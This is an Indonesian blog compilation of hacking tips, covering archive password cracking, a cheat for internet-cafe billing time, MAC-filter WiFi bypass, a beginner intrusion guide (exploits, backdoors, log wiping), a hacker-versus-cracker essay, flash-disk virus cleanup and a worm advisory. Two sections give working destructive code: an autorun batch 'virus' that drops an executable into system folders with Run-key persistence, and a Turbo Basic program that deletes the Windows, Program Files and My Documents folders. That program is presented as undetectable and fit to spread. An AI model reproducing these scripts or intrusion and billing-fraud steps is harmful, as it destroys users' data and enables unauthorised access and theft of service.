Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.

RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.
Utility kecil yang bernama RarCrack dijalankan dengan command line.

silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.

Cara menggunakannya :

RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .

@ingat
aplikasi ini hanya dapat bekerja di linux saja.

HACK WAKTU BILLING CyberBilling All Version [hack warnet]

ini adalah trik untuk menghentikan billing yang biasa ada diwarnet. bisa dilambatin sma bisa diberhentiin .
pakai Cheat Engine v5.3

download disini .
untuk tutorialnya .
cyberbilling-ray16 Url:
http://www.indowebster.com/cyberbillingray16.html

Diupload tgl: 20/02/08 Size: 186.82MB

Vurln nya di sinkronisasi waktu server sma client,
coz
Client > Server
kalo klien waktunya berhenti / lambat di server pun juga gitu .
cara, tapi jng ketahuan servernya ya ??

1. SETELAH PAKAI CHEAT ENGINE DAN WAKTU BERHENTI / LAMBAT
2. SETELAH PUAS MAIN
3. RESTARTTTT!! DENGAN TOMBOL PANIC.

coba aja !!
cheat engine bisa didownload lewatb sini :
http://www.heijnen1.demon.nl/
setelah itu cari cheat engine v5.3 .

Hacking Wireless Hotspot dengan Backtrack 2

Artikel ini tidak cocok jika saat melakukan koneksi, sistem meminta Anda untuk memasukkan encryption key. Artikel ini tidak cocok jika saat membuka website Anda dihadapkan pada halaman yang meminta Anda untuk memasukkan username dan password. Opss….tapi jangan buru-buru berhenti dulu membaca artikel ini, siapa tahu di tempat dan waktu yang lain Anda menemukan kasus yang sama. Artikel ini hanya bisa dipraktikan jika hotspot yang mempunyai wireless security berupa Mac Address filter. Ok.. mari kita mulai..
Siapkan alat dan bahan berikut

Laptop yang support WLAN ( boleh juga pake PC dgn usb-wlan klo Anda kuat menentengnya ke mana-mana )

Backtrack 2 Live CD (Penerus dari Linux Auditor, bisa di download di sini)
http://remote-exploit.org/
Mac changer for windows seperti a-Mac Address Change (bisa di download di sini)
http://rapidshare.com/files/38239013/macchange.zip

Langkah-langkah:

Hidupkan laptop Anda dengan booting dari CD/DVD
Masukkan CD Backtrack tunggu sampai sistem ready dan masukkan login : root dan password: toor
Ketikkan “startx” tanpa tanda kutip.
Setelah X-Windows nya Backtrack muncul klik tombol KDE –> Backtrack –> Radio Network Analysis –> 80211 –> all –> airodump
pada command line ketik : airodump-ng eth1 (sesuaikan dengan device Anda yang aktif)
Tentukan target ESSID yang diinginkan dan catat Mac Address client yang terhubung ke ESSID target, seperti gambar di sini

Ubah Mac Address wlan Anda dengan cara klik tombol KDE –> Backtrack –> Radio Network Analysis –> 80211 –> all –> mac change , untuk jelasnya klik di sini

klik tombol KDE –>Internet –> Wireless Assistant untuk mencoba konek ke ESSID target.
Reboot Backtrack dan booting dari windows, kemudian install a-Mac Address Change dan ubah Mac Address Wlan Anda.

Tes koneksi ke ESSID target.

Belajar Hack Yuck!

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.




Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.

Hacking buat pemula
- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh goes_seber. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking

Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education

hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…


1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget

2. Fase Eksekusi

~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t http://www.target.com/# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

perbedaan hacker dan cracker

Ketika saya membaca sebuah tulisan tentang hacker dan cracker, beberapa hari yang lalu, saya tersadarkan akan kesalahan penafsiran saya pada dua istilah tersebut dalam dunia cyberspace. Awalnya saya beranggapan bahwa hacker adalah cracker itu sendiri. Atau sama-sama mengusung sebuah "penamaan" untuk membobol mekanisme dan kinerja komputer orang lain. Hal itu pula lah yang kemudian menggiring kesadaran saya untuk mencoba berselancar di dalam internet selama berjam-jam, mengeprin beberapa naskah yang berkaitan dengan itu dan mencoba berkomunikasi dengan orang lain dalam arena chating.

Satu pertanyaan yang saya ajukan pada mereka adalah, apa itu hacker? Dan tragisnya, apa yang mereka jawab hampir sama dengan apa yang saya miliki, yakni seorang hacker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan "mengacak-ngacak" dokumen didalamnya. Lalu apa itu cracker? Jawabannya pun nyaris sama. Intinya, baik hacker maupun cracker adalah para penyusup yang harus di waspadai keberadaanya. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.

Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini

PERSOALAN DASAR
Hacker dalam tulisan Eric Steven Raymond adalah " there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"
Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.
Lebih lanjut Raymon mengatakan " jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".
Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lin, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.
Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).
Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi " yang seharusnya makna itu diterapkan pada seorang cracker.
Sebut misalnya film the Net (1995), Take Down(1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.
Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.
Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untukmenyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat progranm komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahmi karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)

MENJADI HACKER
Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauhmana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?

Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.

Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.

Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.

Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.

AWAL SEBUAH PERJUANGAN

Ketika kita meniatkan diri untuk lebih akrab dengan dunia hacker, maka selain beberapa bekal yang disebutkan diatas, penguasaan bahasa pemrograman, html dan bahasa inggris, nampaknya niat tersebut harus juga dilengkapi dengan satu sikap mendasar tentang orientasi dan tujuan awal kita menjadi seorang hacker. Alih-alih menjadi seorang pakar pemrograman yang baik, jika tidak benar malah bisa terjebak pada prilaku negativ yang tidak hanya merugikan orang lain tapi merugikan diri sendiri. Konon, jika seandainya saja anda menjadi seorang cracker dan anda dikenal suka membuka rahasia orang lain, maka, jangan harap anda dapat dengan mudah berjalan-jalan kemanca negara. Karena, kata beberapa sumber, nama anda sudah di "black list" sebagai penjahat cyber?

Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kehawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.

Mengilangkan Virus dan Mengembalikan Data di Flash Disk

Makin meningkatnya penggunaan flash disk, membuat pembuat virus mengalihkan sasarannya ke media penyimpanan yang simple tersebut, bukan hanya menanamkan virus tetapi juga efek yang dihasilkan beraneka ragam, salah satunya isi yang ada di flash disk, seperti file atau folder disembunyikan (Hidden).

Gimana cara menanggulangi kasus tersebut? , coba ikuti langkah-langkah di bawah ini :
Menghilangkan virus

Langkah Pertama
1.Pastikan antivirus terupdate
2.Masukkan flash disk ke PC atau Laptop
3.Jangan membuka kotak dialog yang muncul ketika flash disk dimasukkan ke PC atau laptop.

Langkah kedua
1.Buka windows Explorer atau My Computer
2.Klik kanan mouse di posisi drive flash disk,biasanya F:
3.Kemudian pilih scan virus sesuai anti virus yang digunakan

(“ingat”, biasakan antivirus terupdate)

Mengembalikan data
Setelah virus benar-benar hilang dari flash disk, sekarang saatnya mengembalikan data yang disembunyikan (Hidden). Berikut langkah-langkahnya:
1.Buka Command Prompt, bisa dengan cara klik Start – Run- ketik cmd atau command (untuk Windows 98/ME).
2.Setelah terbuka jendela command prompt,kemudian ketik attrib -h -r -s -a /s /d f:
(dengan catatan berada di drive C, sebagai contoh; C:\Documents and Settings\test> attrib -h -r -s -a /s /d f: )
3.Lalu setelah perintah tersebut diketikkan,kemudian enter.
4.Apabila langkah no.2 tidak berhasil, anda pindahkan posisinya dari drive C ke drive flash disk (biasanya F), untuk memindahkan posisi drive, ikuti langkah berikut, apabila posisi flash disk di komputer atau laptop ada di drive F, maka (sebagai contoh);C:\Documents and Settings\test> F: kemudian enter maka akan pindah ke drive F:\>
5.Setelah berada di posisi drive flash disk kemudian ketik perintah yang sama dengan langkah no.2, namun untuk f: yang berada di belakang dihilangkan, sebagai contoh :
F:\> attrib -h -r -s -a /s /d , kemudian enter.
6.Sesudah proses tersebut, sekarang coba cek folder atau file yang ada di flash disk.

cara melihat virus yank terhiden

cara menghindari virus yang memanfaatkan fitur autorun untuk dapat bekerja. Kali ini aku akan sedikit memberi tahu bagaimana cara menghapus virus tersebut jika menginginkan secara manual saja. Hal ini dapat berarti mungkin saja kamu yang nggak sempat memakai antivirus atau memang sengaja bagaimana virus tersebut bekerja. Namun hal ini jarang terjadi, siapa sich yang main - main dengan komputernya. Apa lagi itu komputer pribadi dan merupakan komputer kesayangan.

Jujur saja, sebenarnya aku juga baru tahu jika ternyata folder yang menyimpan si jabang bayi Virus Ise32 terhidden secara nggak aku sadari. Sebetulnya aku sudah merubah settingan di folder option menjadi view hidden file. Namun tetap saja nggak kelihatan. Nach, buat yang mau melihat sebenarnya sembunyi di mana virus tersebut. Silahkan baca sampai selesai. Oh ya, buat yang belum baca artikelku yang terdahulu lebih baik kamu pelototin lagi. Siapa tahu ada gunanya.

Jika ingin melihat virus yang tersembunyi tersebut. Silahkan kamu ikuti cara - cara di bawah. Mohon di mengerti dan pelototin benar - benar. Aku nggak ngasih garansi kalau komputer sampean rusak.
1. Buka Windows Explorer
2. Klik di Tool - Folder Option...
3. Pada pilihan atas yang General, View, File Types dan Offline Files. Kamu pilih saja yang View.
4. Cari kata - kata berikut: Hide protected operation system files (Recommended). Kalau sudah kamu buang saja centang di sisi kirinya. Nanti kalau udah kelar, seharusnya ada peringatan Acuhkan saja dan klik Ok. Itu nggak papa kok.
5. Kalau sudah kamu cek lagi di mana kamu curigai yang ada virusnya. Seharusnya kalau virus tersebut memakai cara seperti virus autorun ISE32.exe. Virus tersebut akan kelihatan namun berupa folder terhidden bernama RECYCLER.

cara buat virus dari notepad

yah ini adalah virus sederhana yang terbuat dari notepad, jangan kawatir virus ini gak berbahaya kok. Tenang aja, dan yang penting virus ini gak terdetek ma anti virus yang ada ( yah itu yang aku tahu )???!
Caranya: buka notepad terlebih dahulu dan copy & paste sckipt dibawah ini!

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y


reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "WARNING MESSAGE FROM LOCAL_HOST(judul title bar)" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /d 0 /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add "HKEY_CURRENT_USER/Control Panel/Colors" /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat
lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)

- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY

- copy file-file tsb ke CD
- nikmati efeknya

Note:

1. Virus ini hanya dapat berjalan di Windows XP
2. Jangan salah gunakan virus ini ya!!!!!!

cara membuat virus dengan turbo basic

- Download Turbo Basic v1.0

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.

Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.

shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows,

hati hati penyebaran virus baru

W32/Small.KL@mm 19 Januari 2006


Alias : Win32.Blackmal.F, Win32/Cabinet!Worm, WORM_GREW.A (Trend),
W32/Nyxem-D (Sophos)

Rupanya bukan hanya Guru Kumon yang senang memberikan pekerjaan rumah.
Ternyata beberapa virus mengharuskan kita (khususnya administrator
server) berurusan dengan "pekerjaan rumah" yang dalam kenyataannya tidak
dikerjakan di rumah dan kebanyakan dikerjakan di kantor sehingga mungkin
lebih cocok jika diberikan istilah Pekerjaan Kantor / PK (bukan parpol).
PK apa yang diberikan oleh virus bagi anda ? Salah satunya adalah virus
W32/Small.KL@mm yang sekarang datang tidak hanya dalam lampiran
konvensional seperti .exe, melainkan dalam lampiran yang tidak biasa
seperti .HQX, .BHX, .B64, .mim dan ..uu sehingga bagi administrator yang
"hobi" memblok lampiran executable dan terakhir memblok lampiran gambar
karena celah keamanan WMF maka anda harus segera menambahkan daftar
blacklist lampiran yang tidak boleh melewati mailserver anda. Small.KL
ini cukup berbahaya karena memiliki rutin balas dendam "membasmi"
program antivirus dan menurut pantauan Vaksincom menelan korban di Jawa
Timur dengan salah satu korbannya IP milik ISP pemerintah terbesar dan
satu IP milik ISP terbesar di Jakarta yang berkantor di Manggala
Wanabakti dan IP tersebut digunakan oleh salah satu distributor komputer
besar (NEC, Acer, HP) di Jakarta yang berkantor di jalan Riau.

Penyebaran melalui email dan jaringan lokal

Small.KL menyebarkan dirinya menggunakan dua metode, yaitu jaringan
lokal dan email. Ia akan mengumpulkan daftar alamat email dari komputer
yang di infeksinya dan ia akan mengirimkan dirinya dengan alamat
pengirim yang dipalsukan. Seperti yang kami utarakan diatas, selain
mengirimkan lampiran dalam bentuk file eksekusi seperti .pif dan .scr,
Small.KL juga mengirimkan dirinya dalam lampiran yang tidak umum seperti
.HQX, .BHX, .B64, .mim dan ..uu dengan tujuan utama agar dapat lolos
dari saringan yang dilakukan oleh antivirus / mailserver yang umumnya
melakukan blokir atas lampiran eksekusi seperti .exe, .com, .pif, .vbs
dst. Bahkan perkembangan terakhir menyebabkan administrator mailserver
konservatif terpaksa memblok lampiran terkompres
(.zip) dan gambar (.jpg, .gif, .bmp dst) karena mulai dieksploitasi oleh
virus. Tampaknya daftar ekstensi yang harus diblok bertambah panjang dan
makin hari makin luas saja sehingga tentunya mengharuskan administrator
selalu aktif memantau perkembangan terbaru dan melakukan tindakan yang
diperlukan. Salah satu metode yang patut dipertimbangkan adalah metode
Whitelist, dimana administrator menetapkan apa saja jenis ekstensi
lampiran yang boleh melewati mailserver dan sisanya akan diblok.

Detail email mengandung W32/Small.KL@mm
Small.KL akan datang dalam bentuk email dengan perincian sebagai berikut
:
From : dipalsukan
Subject :
Re: Sex Video
Re:
Fw: Picturs
Fw: Funny :)
Fwd: Photo
Fwd: image.jpg
Fw: Sexy
Fw:
Fw: SeX.mpg
Fwd: Crazy illegal Sex!
Fw: DSC-00465.jpg
eBook.pdf
Hello
Fw: Real show
the file
Word file
*Hot Movie*
A Great Video
Fw:
Fw: DSC-00465.jpg
Fw: Funny :)
Fw: Picturs
Fw: Real show
Fw: SeX.mpg
Fw: Sexy
Fwd: Crazy illegal Sex!
Fwd: image.jpg
Fwd: Photo
give me a kiss
Miss Lebanon 2006
My photos
Part 1 of 6 Video clipe
Photos
Re:
School girl fantasies gone bad

Isi Email :
What?
Note: forwarded message attached.
forwarded message attached.
i attached the details.
Thank you
hi
i send the details
bye

how are you?
i send the details.
OK ?
Please see the file.
i just any one see my photos.
The Best Videoclip Ever

Some message bodies contain empty image files which may be labeled with
one of the following file names: DSC-00465.jpg DSC-00466.jpg
DSC-00467.jpg photo photo2 photo3

Lampiran :
New_Document_file.pif
document.pif
007.pif
eBook.PIF
DSC-00465.Pif
Attachments001.BHX
Attachments00.HQX
Attachments[001].B64
Video_part.mim
Word_Document.hqx
SeX.mim
Sex.mim
Word_Document.uu
Original Message.B64
3.92315089702606E02.UUE
Photos
Sweet_09
Clipe
WinZip.BHX

Small.KL juga akan berusaha menyebarkan dirinya melalui jaringan dengan
cara mengkopikan dirinya pada direktori sharing dengan nama
WINZIP_TMP.EXE.

Superhidden dan menyebabkan hang untuk memaksa loading dirinya

Menurut pengetesan yang dilakukan Lab virus Vaksincom, Small.KL memiliki
kemampuan menyembunyikan dirinya sangat baik, dimana jika dilihat dengan
Windows Explorer filenya tidak akan terlihat, "sekalipun" setting option
Windows Explorer sudah diminta untuk menampilkan file hidden (Show
Hidden File). Metode yang cukup canggih ini adalah dengan memanfaatkan
perintah "Superhidden" pada registry. Untuk memaksakan dirinya
diaktifkan, setelah menginfeksi komputer dan menempatkan dirinya pada
Satrt Up, komputer yang baru terinfeksi Small.KL akan hang sehingga
terpaksa di restart. Proses restart ini yang secara tidak langsung
